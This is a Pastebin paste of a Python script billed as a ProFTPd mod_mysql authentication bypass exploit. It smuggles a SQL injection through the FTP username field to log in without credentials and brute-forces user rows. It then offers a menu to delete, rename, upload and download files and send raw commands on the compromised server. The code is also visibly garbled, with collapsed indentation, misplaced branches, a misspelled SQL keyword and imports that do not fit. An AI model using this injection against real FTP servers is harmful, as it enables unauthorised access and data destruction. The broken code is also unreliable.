SHARE
TWEET

Untitled

a guest Jun 8th, 2017 80 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3.  
  4. ## --------------------------------------------------------------------
  5. ## ProFTPd with mod_mysql Authentication Bypass Exploit [PYTHON]
  6. ## Code By NqrK
  7. ## Powered By Python 2.6
  8. ##
  9. ##
  10. ## --------------------------------------------------------------------
  11. ## Class :       Input Validation Error
  12. ## Remote:       Yes
  13. ## Credit:
  14. ## Page  :
  15. ##
  16. ##
  17. ##
  18. ## --------------------------------------------------------------------
  19. ##
  20. ## to sufficiently sanitize user-supplied data before using it in an SQL query.
  21. ##
  22. ## modify data, or exploit latent vulnerabilities in the underlying database.
  23. ## This may result in unauthorized access and a compromise of the application,
  24. ## other attacks are also possible.
  25. ## --------------------------------------------------------------------
  26.  
  27.  
  28.  
  29. import os
  30. import sys
  31. import ftplib
  32. from ftplib import FTP
  33. from Xlib.protocol.structs import Host
  34. from __builtin__ import raw_input
  35. from twisted.protocols import ftp
  36.  
  37. try:
  38.     os.system('color 0a')
  39.     os.system('title ProFTPd with mod_mysql Authetication Bypass Exploit')
  40.  
  41. except:
  42.     print("[!]You are in Unix, Change of exploit... [ok].")
  43.     print("[+]Run modules Unix_Kernel..[RUN].\n")
  44.  
  45.  
  46. def Core():
  47.     """
  48.  
  49.     """
  50.     print("\n\t[!]Please Choose a Command To Execut On ", Host, "\n")
  51.     print("[1] Show Files.")
  52.     print("[2] Delete Files.")
  53.     print("[3] Rename Files or Dir")
  54.     print("[4] Create Directory")
  55.     print("[5] Personnal Command")
  56.     print("[6] Download Files")
  57.     print("[7] Upload Files")
  58.     print("[8] Change Directory")
  59.     print("[9] Clear Console")
  60.     print("[0] Show Menu")
  61.     print("[E] Exit\n")
  62.  
  63.     while (1):
  64.         cmd = raw_input("root@cmd ~ #")
  65.         if cmd == "1":
  66.             print("[!]Listing File On Server : ", Host, "...\n")
  67.             try:
  68.                 ftp.retrlines('LIST')
  69.                 print("[+]Listing File On", Host, "is SuccessFul !\n")
  70.  
  71.             except:
  72.                     print("[!] Cannot Listing File On", Host, "\n\a")
  73.         elif cmd == "2":
  74.             print("[!] Please Specify a File To Delete\n")
  75. try:
  76.     File = raw_input("Remove File : ")
  77.     ftp.delete(File)
  78.     print("[+]File {", File, "} Deleted ! \n")
  79. except:
  80.     print("[!] Cannot Deleting File On", Host, "\n\a")
  81. elif cmd == "3":
  82. print("[!] Please Speecify a File To Rename\n")
  83. try:
  84.     File = raw_input("Rename File : ")
  85.     Rename = raw_input("New Name : ")
  86.     ftp.rename(File, Rename)
  87.     print("[+]File {", File, "} Renamed to {", Rename, "} \n")
  88. except:
  89.     print("[!] Cannot Renamed File On", Host, "\n\a")
  90. elif cmd == "4":
  91. print("[!] Please Specify a Directory Name To create\n")
  92. try:
  93.     DIR = raw_input("New Directory : ")
  94.     ftp.mkd(DIR)
  95.     print("[+]Create a New Directory !\n")
  96. except:
  97.     print("[!] Cannot Created DIR On", Host, "\n\a")
  98. elif cmd == "5":
  99. print("[!] Please Enter you Command :")
  100. print("[!] Enter ''/close'' for Exit Option\n")
  101. while (1):
  102.     perso_cmd = raw_input("root@server ~ # ")
  103.     if perso_cmd == "/close":
  104.         break
  105.     else:
  106.         try:
  107.             request = ftp.sendcmd(perso_cmd)
  108.             print(request)
  109.         except:
  110.             print("[!]Command not Found On ", Host, "\n\a")
  111.     elif cmd == "6":
  112.         print("[!] Please Specify a Files Name To Download\n")
  113.         Rem_Files = raw_input("Download Files : ")
  114.         try:
  115.             ftp.sendcmd('GET '+ Rem_Files)
  116.             print("[+]File {", Rem_Files, "} Downloaded !\n")
  117.         except:
  118.             print("[!] Cannot Download Files On ", Host, "\n\a")
  119.         elif cmd == "7":
  120.         print("[!] Please Specify a Files Name To Upload\n")
  121.         try:
  122.             File = raw_input("Files : ")
  123.             upl = open(File, 'rb')
  124.             ftp.storbinary('STOR '+File, upl)
  125.             upl.close()
  126.             print("[+]File {", File,"} Uploaded !\n")
  127.         except:
  128.             print("[!] Cannot Upload Files On ", Host, "\n\a")
  129.         elif cmd == "8":
  130.         print("[!] Please Specify a Directory Name To Changed\n")
  131.         try:
  132.             Dir = raw_input("Directory : ")
  133.             ftp.sendcmd('CWD '+ Dir)
  134.             print("[+]Directory : ", Dir, "\n")
  135.         except:
  136.             print("[!] Cannot Changed Directory On ", Host, "\n\a")
  137.         elif cmd == "9":
  138.         try:
  139.             os.system('cls')
  140.         except:
  141.             os.system('clear')
  142.         elif cmd == "0":
  143.         print("\n\t[!]Please Choose a Chommand To Execut On ", Host, "\n")
  144.         print("[1] Show Files.")
  145.         print("[2] Delete Files.")
  146.         print("[3] Rename Files or Dir")
  147.         print("[4] Create Files or Dir")
  148.         print("[5] Personnal Command")
  149.         print("[6] Download Files")
  150.         print("[7] Upload Files")
  151.         print("[8] Change Directory")
  152.         print("[9] Clear Console")
  153.         print("[0] Show Menu")
  154.         print("[E] Exit\n")
  155.  
  156.     elif cmd == "E":
  157.     ftp.quit()
  158.     print("[!]Disconnection.....[ok].\a")
  159.     print("[+]Unloading exploit....[ok].\a")
  160.     print("Exit...[OUT].\a\n")
  161.  
  162.     raw_input("Press ENTER To Continue...")
  163.  
  164.  
  165.     break
  166.  
  167. def Brute():
  168.     print("\n\t=================================================")
  169.     print("\t [+] Attempting User Directory Discover Via FTP")
  170.     print("\t=================================================\n")
  171.     go = raw_input("[*] Target Online : ")
  172.     print("\n")
  173. def brute():
  174.     for i in range(0, 31):
  175.         try:
  176.             username = "%') and 1 = 2 union select 1, 1uid, gid, homedir, shell from ftpuser LINIT "+str(i) +",1; --"
  177.             password = str("1")
  178.             ftp = FTP(go)
  179.             ftp.login(username, password)
  180.             print("\n\a\t[+] Logged in as user "+ str(i) +",1")
  181.             ftp.retrlines('LIST')
  182.             ftp.close()
  183.         except:
  184.             print("[!] Invalid USER ["+str(i)+"] number On ", go, "....Auto-Restart BruteForcer.")
  185.  
  186.             brute()
  187.             print("\n[$] Brute-Force Finished..\n")
  188.             raw_input()
  189.             print("")
  190.             print("\t=========================================================")
  191.             print("\t[+] ProFTPd with mod_mysql Authentication Bypass Exploit")
  192.             print("\t[+] Credits Go For NqrK For Finding The Bug !")
  193.             print("\t                       [+]Exploited By NqrK")
  194.             print("\t                       [+]Forum.pr0ceed.net")
  195.             print("\t=========================================================\n\a")
  196.             user = "%') and 1=2 union select 1, 1uid, gid, homedir, shell from ftpuser, --"
  197.             passwd = "1"
  198.             Host = raw_input(" [*]Target: ")
  199.             print("\n\a [!] Attacking ", Host, "...\n")
  200.             try:
  201.                 print("[+]Conneect to host [waiting please]...\n\a")
  202.                 ftp = FTP(Host)
  203.                 print("[+]Connected to ", Host, "\n\a")
  204.                 try:
  205.                     print("[+]loading exploit...Attacking..[Waiting Please]. \n")
  206.                     ftp.login(user, passwd)
  207.                     try:
  208.                         print("[+]Attacking succeessful !\n\a")
  209.                         print("[+]Exploit PWNED The Machine : ", Host, " Enter in Matrix...\a\n")
  210.                         Core()
  211.                         sys.exit()
  212.                     except:
  213.                         print("[!]END ProFTPd with mod_mysql Authentication Bypass Exploit in Python 3.5 By NqrK\n\a")
  214.                     except:
  215.             print("[!] Couldn't ByPass The authentication !\a\n")
  216.             print("\n[+] Attempting User Directory Discover Via FTP [+]\n ")
  217.             choice = raw_input("(yes)/(no): ")
  218.             if choice == "yes":
  219.                 Brute()
  220.             else:
  221.                 pass
  222.  
  223.  
  224.  
  225.         except:
  226.  
  227.  
  228.             print("[!] Cannot connect to ", Host, "\n\a")
  229.             raw_input()
  230.  
  231.     ##END
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top